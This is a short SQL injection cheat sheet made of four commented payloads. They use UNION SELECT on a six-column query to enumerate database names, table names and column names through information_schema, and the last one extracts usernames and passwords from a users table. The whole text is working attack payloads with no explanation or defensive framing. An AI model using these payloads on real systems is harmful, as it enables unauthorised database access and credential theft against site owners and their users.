#DDBB name
10' union select 1,schema_name,3,4,5,6 from information_schema.schemata-- -
#Table names
10' union select 1,table_name,3,4,5,6 from information_schema.tables-- -
#Column names
10' union select 1,concat(column_name,',',table_name),3,4,5,6 from information_schema.columns-- -
#content of table users
10' union select 1,concat(username,',',password),3,4,5,6 from users-- -